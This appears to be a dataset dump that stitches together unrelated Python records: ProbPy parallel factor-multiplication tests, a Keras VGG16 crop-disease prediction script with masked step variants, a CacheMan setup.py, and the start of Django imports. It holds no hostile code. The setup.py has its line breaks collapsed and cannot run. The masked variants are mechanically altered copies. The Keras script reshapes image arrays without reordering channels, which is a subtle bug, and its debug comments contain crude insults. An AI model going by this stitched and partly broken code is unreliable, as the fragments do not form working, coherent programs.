"step-5": "from nose.tools import with_setup, nottest\n\nfrom tests.par_test_base import ParTestBase\nfrom ProbPy import RandVar, Factor, ParFactor\n\n\nclass TestFactorMult(ParTestBase):\n def __init__(self):\n super().__init__()\n\n def par_test_0(self):\n \"\"\"\n f(X), scalar\n \"\"\"\n\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n\n res = [\n self.X_factor.mult(self.scalar),\n self.X_factor.mult(self.scalarf),\n self.scalarf.mult(self.X_factor),\n ]\n\n par_res = [\n self.X_par_factor.mult(self.scalar),\n self.X_par_factor.mult(self.par_scalarf),\n self.par_scalarf.mult(self.X_par_factor),\n ]\n\n for i, ele in enumerate(res):\n assert (\n ele.rand_vars == par_res[i].rand_vars\n and ele.values == par_res[i].values\n )\n\n def par_test_1(self):\n \"\"\"\n f(X, Y), scalar\n \"\"\"\n\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n\n res = [\n self.XY_factor.mult(self.scalar),\n self.XY_factor.mult(self.scalarf),\n self.scalarf.mult(self.XY_factor),\n ]\n\n par_res = [\n self.XY_par_factor.mult(self.scalar),\n self.XY_par_factor.mult(self.par_scalarf),\n self.par_scalarf.mult(self.XY_par_factor),\n ]\n\n for i, ele in enumerate(res):\n assert (\n ele.rand_vars == par_res[i].rand_vars\n and ele.values == par_res[i].values\n )\n\n def par_test_2(self):\n \"\"\"\n f(X, Y, Z), scalar\n \"\"\"\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n\n res = [\n self.XYZ_factor.mult(self.scalar),\n self.XYZ_factor.mult(self.scalarf),\n self.scalarf.mult(self.XYZ_factor),\n ]\n\n par_res = [\n self.XYZ_par_factor.mult(self.scalar),\n self.XYZ_par_factor.mult(self.par_scalarf),\n self.par_scalarf.mult(self.XYZ_par_factor),\n ]\n\n for i, ele in enumerate(res):\n assert (\n ele.rand_vars == par_res[i].rand_vars\n and ele.values == par_res[i].values\n )\n\n def par_test_3(self):\n \"\"\"\n f(X), f(X)\n \"\"\"\n\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n\n res = self.X_factor.mult(self.X_factor)\n par_res = self.X_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_4(self):\n \"\"\"\n f(X), f(Y)\n \"\"\"\n\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.Y_par_factor.setMaxDepth(i)\n\n res = self.X_factor.mult(self.Y_factor)\n par_res = self.X_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_5(self):\n \"\"\"\n f(X, Y) f(X)\n \"\"\"\n\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n\n res = self.XY_factor.mult(self.X_factor)\n par_res = self.XY_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_6(self):\n \"\"\"\n f(X, Y) f(Y)\n \"\"\"\n\n for i in range(4):\n self.Y_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n\n res = self.XY_factor.mult(self.Y_factor)\n par_res = self.XY_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_7(self):\n \"\"\"\n f(X, Y) f(Z)\n \"\"\"\n\n for i in range(4):\n self.Z_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n\n res = self.XY_factor.mult(self.Z_factor)\n par_res = self.XY_par_factor.mult(self.Z_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_8(self):\n \"\"\"\n f(X, Y) f(X, Y)\n \"\"\"\n\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n\n res = self.XY_factor.mult(self.XY_factor)\n par_res = self.XY_par_factor.mult(self.XY_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_9(self):\n \"\"\"\n f(X, Y) F(X, Z)\n \"\"\"\n\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XZ_par_factor.setMaxDepth(i)\n\n res = self.XY_factor.mult(self.XZ_factor)\n par_res = self.XY_par_factor.mult(self.XZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_10(self):\n \"\"\"\n f(X, Y) f(Z, W)\n \"\"\"\n\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.ZW_par_factor.setMaxDepth(i)\n\n res = self.XY_factor.mult(self.ZW_factor)\n par_res = self.XY_par_factor.mult(self.ZW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_11(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, Z)\n \"\"\"\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_12(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, W)\n \"\"\"\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XYW_factor)\n par_res = self.XYZ_par_factor.mult(self.XYW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_13(self):\n \"\"\"\n f(X, Y, Z) f(X, K, W)\n \"\"\"\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_14(self):\n \"\"\"\n f(X, Y, Z) f(T, K, W)\n \"\"\"\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.TKW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.TKW_factor)\n par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n",
"step-ids": [
12,
14,
15,
16,
19
]
}
|
[
12,
14,
15,
16,
19
] |
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 5 02:39:55 2017
@author: sparsh
"""
"""
Crop Disease Classification Project for Code Fun Do 2017 - IIT Roorkee
"""
"""
File for predicting a test image.
"""
import os
os.environ['THEANO_FLAGS'] = "device=gpu1, floatX=float32"
import theano
import numpy as np
np.random.seed(1)
import pandas as pd
import h5py
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D
from keras.layers import Activation, Dropout, Flatten, Dense
from keras import backend as K
from PIL import Image
K.set_image_dim_ordering('th')
#Path to model weights file
weights_path = "E:\\Interesting\\Code Fun Do 2017\\vgg16_weights.h5"
top_model_weights_path = "E:\\Interesting\\Code Fun Do 2017\\bottleneck_fc_model.h5"
#Unknown Image Location
validation_data_dir = "E:\\Interesting\\Code Fun Do 2017\\Trial\\cercospora_leaf_spot_365.jpg"
#validation_data_dir = "E:\\Interesting\\Code Fun Do 2017\\Trial"
#input image dimensions
img_width = 200
img_height = 200
input_shape = (3, img_height, img_width)
#Model parameters
batch_size = 32
nb_classes = 4
nb_epoch = 3
nb_train_samples = 50
nb_validation_samples = 25
# build the VGG16 network
model = Sequential()
model.add(ZeroPadding2D((1, 1), input_shape=(3, img_width, img_height)))
model.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_2'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_2'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_2'))
model.add(ZeroPadding2D((1, 1)))
model.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
# load the weights of the VGG16 networks
# (trained on ImageNet, won the ILSVRC competition in 2014)
# note: when there is a complete match between your model definition
# and your weight savefile, you can simply call model.load_weights(filename)
assert os.path.exists(weights_path), "Model weights not found (see 'weights_path' variable in script)."
f = h5py.File(weights_path)
for k in range(f.attrs['nb_layers']):
if k >= len(model.layers):
# we don't look at the last (fully-connected) layers in the savefile
break
g = f['layer_{}'.format(k)]
weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]
model.layers[k].set_weights(weights)
f.close()
print("Model loaded.\n")
# build a classifier model to put on top of the convolutional model
top_model = Sequential()
top_model.add(Flatten(input_shape=model.output_shape[1:]))
top_model.add(Dense(256, activation='relu'))
top_model.add(Dropout(0.5))
top_model.add(Dense(nb_classes, activation='softmax'))
# note that it is necessary to start with a fully-trained
# classifier, including the top classifier,
# in order to successfully do fine-tuning
top_model.load_weights(top_model_weights_path)
# add the model on top of the convolutional base
model.add(top_model)
#print("DC.\n")
print("Final Model Assembled.\n")
#datagen = ImageDataGenerator(rescale=1./255)
#generator = datagen.flow_from_directory(
# validation_data_dir,
# target_size=(img_width, img_height),
# batch_size=32,
# class_mode=None,
# shuffle=False)
#bottleneck_features_validation = model.predict_generator(generator, nb_validation_samples)
#np.save(open('bottleneck_features_validation.npy', 'w'), bottleneck_features_validation)
#print("Testing features stored.\n")
#data = np.load(open('bottleneck_features_validation.npy'))
img = Image.open(validation_data_dir)
img.load()
#print("chutiya.\n")
data = np.asarray(img, dtype="int32")
#print("harami.\n")
print(data.shape)
data = data.reshape(1, 3, 200, 200)
print("Prediction begins.\n")
output = model.predict_classes(data, batch_size=32, verbose=1)
print(output)
|
normal
|
{
"blob_id": "96210942b01c510300120913bed1bc6d497a39a9",
"index": 1945,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nnp.random.seed(1)\n<mask token>\nK.set_image_dim_ordering('th')\n<mask token>\nmodel.add(ZeroPadding2D((1, 1), input_shape=(3, img_width, img_height)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nassert os.path.exists(weights_path\n ), \"Model weights not found (see 'weights_path' variable in script).\"\n<mask token>\nfor k in range(f.attrs['nb_layers']):\n if k >= len(model.layers):\n break\n g = f['layer_{}'.format(k)]\n weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]\n model.layers[k].set_weights(weights)\nf.close()\nprint('Model loaded.\\n')\n<mask token>\ntop_model.add(Flatten(input_shape=model.output_shape[1:]))\ntop_model.add(Dense(256, activation='relu'))\ntop_model.add(Dropout(0.5))\ntop_model.add(Dense(nb_classes, activation='softmax'))\ntop_model.load_weights(top_model_weights_path)\nmodel.add(top_model)\nprint('Final Model Assembled.\\n')\n<mask token>\nimg.load()\n<mask token>\nprint(data.shape)\n<mask token>\nprint('Prediction begins.\\n')\n<mask token>\nprint(output)\n",
"step-3": "<mask token>\nos.environ['THEANO_FLAGS'] = 'device=gpu1, floatX=float32'\n<mask token>\nnp.random.seed(1)\n<mask token>\nK.set_image_dim_ordering('th')\nweights_path = 'E:\\\\Interesting\\\\Code Fun Do 2017\\\\vgg16_weights.h5'\ntop_model_weights_path = (\n 'E:\\\\Interesting\\\\Code Fun Do 2017\\\\bottleneck_fc_model.h5')\nvalidation_data_dir = (\n 'E:\\\\Interesting\\\\Code Fun Do 2017\\\\Trial\\\\cercospora_leaf_spot_365.jpg')\nimg_width = 200\nimg_height = 200\ninput_shape = 3, img_height, img_width\nbatch_size = 32\nnb_classes = 4\nnb_epoch = 3\nnb_train_samples = 50\nnb_validation_samples = 25\nmodel = Sequential()\nmodel.add(ZeroPadding2D((1, 1), input_shape=(3, img_width, img_height)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nassert os.path.exists(weights_path\n ), \"Model weights not found (see 'weights_path' variable in script).\"\nf = h5py.File(weights_path)\nfor k in range(f.attrs['nb_layers']):\n if k >= len(model.layers):\n break\n g = f['layer_{}'.format(k)]\n weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]\n model.layers[k].set_weights(weights)\nf.close()\nprint('Model loaded.\\n')\ntop_model = Sequential()\ntop_model.add(Flatten(input_shape=model.output_shape[1:]))\ntop_model.add(Dense(256, activation='relu'))\ntop_model.add(Dropout(0.5))\ntop_model.add(Dense(nb_classes, activation='softmax'))\ntop_model.load_weights(top_model_weights_path)\nmodel.add(top_model)\nprint('Final Model Assembled.\\n')\nimg = Image.open(validation_data_dir)\nimg.load()\ndata = np.asarray(img, dtype='int32')\nprint(data.shape)\ndata = data.reshape(1, 3, 200, 200)\nprint('Prediction begins.\\n')\noutput = model.predict_classes(data, batch_size=32, verbose=1)\nprint(output)\n",
"step-4": "<mask token>\nimport os\nos.environ['THEANO_FLAGS'] = 'device=gpu1, floatX=float32'\nimport theano\nimport numpy as np\nnp.random.seed(1)\nimport pandas as pd\nimport h5py\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\nfrom PIL import Image\nK.set_image_dim_ordering('th')\nweights_path = 'E:\\\\Interesting\\\\Code Fun Do 2017\\\\vgg16_weights.h5'\ntop_model_weights_path = (\n 'E:\\\\Interesting\\\\Code Fun Do 2017\\\\bottleneck_fc_model.h5')\nvalidation_data_dir = (\n 'E:\\\\Interesting\\\\Code Fun Do 2017\\\\Trial\\\\cercospora_leaf_spot_365.jpg')\nimg_width = 200\nimg_height = 200\ninput_shape = 3, img_height, img_width\nbatch_size = 32\nnb_classes = 4\nnb_epoch = 3\nnb_train_samples = 50\nnb_validation_samples = 25\nmodel = Sequential()\nmodel.add(ZeroPadding2D((1, 1), input_shape=(3, img_width, img_height)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\nassert os.path.exists(weights_path\n ), \"Model weights not found (see 'weights_path' variable in script).\"\nf = h5py.File(weights_path)\nfor k in range(f.attrs['nb_layers']):\n if k >= len(model.layers):\n break\n g = f['layer_{}'.format(k)]\n weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]\n model.layers[k].set_weights(weights)\nf.close()\nprint('Model loaded.\\n')\ntop_model = Sequential()\ntop_model.add(Flatten(input_shape=model.output_shape[1:]))\ntop_model.add(Dense(256, activation='relu'))\ntop_model.add(Dropout(0.5))\ntop_model.add(Dense(nb_classes, activation='softmax'))\ntop_model.load_weights(top_model_weights_path)\nmodel.add(top_model)\nprint('Final Model Assembled.\\n')\nimg = Image.open(validation_data_dir)\nimg.load()\ndata = np.asarray(img, dtype='int32')\nprint(data.shape)\ndata = data.reshape(1, 3, 200, 200)\nprint('Prediction begins.\\n')\noutput = model.predict_classes(data, batch_size=32, verbose=1)\nprint(output)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 5 02:39:55 2017\n\n@author: sparsh\n\"\"\"\n\n\"\"\"\nCrop Disease Classification Project for Code Fun Do 2017 - IIT Roorkee\n\"\"\"\n\n\"\"\"\nFile for predicting a test image.\n\"\"\"\n\nimport os\nos.environ['THEANO_FLAGS'] = \"device=gpu1, floatX=float32\"\nimport theano\nimport numpy as np\nnp.random.seed(1)\n\nimport pandas as pd\nimport h5py\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\nfrom PIL import Image\nK.set_image_dim_ordering('th')\n\n#Path to model weights file\nweights_path = \"E:\\\\Interesting\\\\Code Fun Do 2017\\\\vgg16_weights.h5\"\ntop_model_weights_path = \"E:\\\\Interesting\\\\Code Fun Do 2017\\\\bottleneck_fc_model.h5\"\n\n#Unknown Image Location\nvalidation_data_dir = \"E:\\\\Interesting\\\\Code Fun Do 2017\\\\Trial\\\\cercospora_leaf_spot_365.jpg\"\n#validation_data_dir = \"E:\\\\Interesting\\\\Code Fun Do 2017\\\\Trial\"\n\n#input image dimensions\nimg_width = 200\nimg_height = 200\ninput_shape = (3, img_height, img_width)\n\n#Model parameters\nbatch_size = 32\nnb_classes = 4\nnb_epoch = 3\nnb_train_samples = 50\nnb_validation_samples = 25\n\n# build the VGG16 network\nmodel = Sequential()\nmodel.add(ZeroPadding2D((1, 1), input_shape=(3, img_width, img_height)))\n\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\n# load the weights of the VGG16 networks\n# (trained on ImageNet, won the ILSVRC competition in 2014)\n# note: when there is a complete match between your model definition\n# and your weight savefile, you can simply call model.load_weights(filename)\nassert os.path.exists(weights_path), \"Model weights not found (see 'weights_path' variable in script).\"\nf = h5py.File(weights_path)\nfor k in range(f.attrs['nb_layers']):\n if k >= len(model.layers):\n # we don't look at the last (fully-connected) layers in the savefile\n break\n g = f['layer_{}'.format(k)]\n weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]\n model.layers[k].set_weights(weights)\nf.close()\nprint(\"Model loaded.\\n\")\n\n# build a classifier model to put on top of the convolutional model\ntop_model = Sequential()\ntop_model.add(Flatten(input_shape=model.output_shape[1:]))\ntop_model.add(Dense(256, activation='relu'))\ntop_model.add(Dropout(0.5))\ntop_model.add(Dense(nb_classes, activation='softmax'))\n\n# note that it is necessary to start with a fully-trained\n# classifier, including the top classifier,\n# in order to successfully do fine-tuning\ntop_model.load_weights(top_model_weights_path)\n\n# add the model on top of the convolutional base\nmodel.add(top_model)\n#print(\"DC.\\n\")\nprint(\"Final Model Assembled.\\n\")\n\n#datagen = ImageDataGenerator(rescale=1./255)\n#generator = datagen.flow_from_directory(\n# validation_data_dir,\n# target_size=(img_width, img_height),\n# batch_size=32,\n# class_mode=None,\n# shuffle=False)\n#bottleneck_features_validation = model.predict_generator(generator, nb_validation_samples)\n#np.save(open('bottleneck_features_validation.npy', 'w'), bottleneck_features_validation)\n#print(\"Testing features stored.\\n\")\n\n#data = np.load(open('bottleneck_features_validation.npy'))\nimg = Image.open(validation_data_dir)\n\nimg.load()\n#print(\"chutiya.\\n\")\ndata = np.asarray(img, dtype=\"int32\")\n#print(\"harami.\\n\")\nprint(data.shape)\ndata = data.reshape(1, 3, 200, 200)\nprint(\"Prediction begins.\\n\")\noutput = model.predict_classes(data, batch_size=32, verbose=1)\nprint(output)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import osfrom setuptools import setup
def read(fname): with open(fname) as fhandle: return fhandle.read()
def readMD(fname): # Utility function to read the README file. full_fname = os.path.join(os.path.dirname(__file__), fname) if 'PANDOC_PATH' in os.environ: import pandoc pandoc.core.PANDOC_PATH = os.environ['PANDOC_PATH'] doc = pandoc.Document() with open(full_fname) as fhandle: doc.markdown = fhandle.read() return doc.rst else: return read(fname)
version = '2.0.5'required = [req.strip() for req in read('requirements.txt').splitlines() if req.strip()]setup( name='CacheMan', version=version, author='Matthew Seal', author_email='mseal@opengov.com', description='A dependent cache manager', long_description=readMD('README.md'), install_requires=required, license='New BSD', packages=['cacheman'], test_suite='tests', zip_safe=False, url='https://github.com/OpenGov/py_cache_manager', download_url='https://github.com/OpenGov/py_cache_manager/tarball/v' + version, keywords=['tables', 'data', 'analysis', 'extraction'], classifiers=[ 'Development Status :: 4 - Beta', 'Topic :: Utilities', 'License :: OSI Approved :: BSD License', 'Natural Language :: English', 'Programming Language :: Python :: 2 :: Only' ])
|
normal
|
{
"blob_id": "7b18c967cf50d87b089dc22f3fbe6d40d708483f",
"index": 8441,
"step-1": "import osfrom setuptools import setup\ndef read(fname): with open(fname) as fhandle: return fhandle.read()\ndef readMD(fname): # Utility function to read the README file. full_fname = os.path.join(os.path.dirname(__file__), fname) if 'PANDOC_PATH' in os.environ: import pandoc pandoc.core.PANDOC_PATH = os.environ['PANDOC_PATH'] doc = pandoc.Document() with open(full_fname) as fhandle: doc.markdown = fhandle.read() return doc.rst else: return read(fname)\nversion = '2.0.5'required = [req.strip() for req in read('requirements.txt').splitlines() if req.strip()]setup( name='CacheMan', version=version, author='Matthew Seal', author_email='mseal@opengov.com', description='A dependent cache manager', long_description=readMD('README.md'), install_requires=required, license='New BSD', packages=['cacheman'], test_suite='tests', zip_safe=False, url='https://github.com/OpenGov/py_cache_manager', download_url='https://github.com/OpenGov/py_cache_manager/tarball/v' + version, keywords=['tables', 'data', 'analysis', 'extraction'], classifiers=[ 'Development Status :: 4 - Beta', 'Topic :: Utilities', 'License :: OSI Approved :: BSD License', 'Natural Language :: English', 'Programming Language :: Python :: 2 :: Only' ])",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from unidecode import unidecode
import pdb
import os, manage
import re
from datetime import *
import codecs
import csv
import smtplib
from django.core.urlresolvers import reverse
from django.shortcuts import redirect
from django.contrib.auth.models import User
from django.db.models import Q
from django.contrib import messages
from django.http import Http404
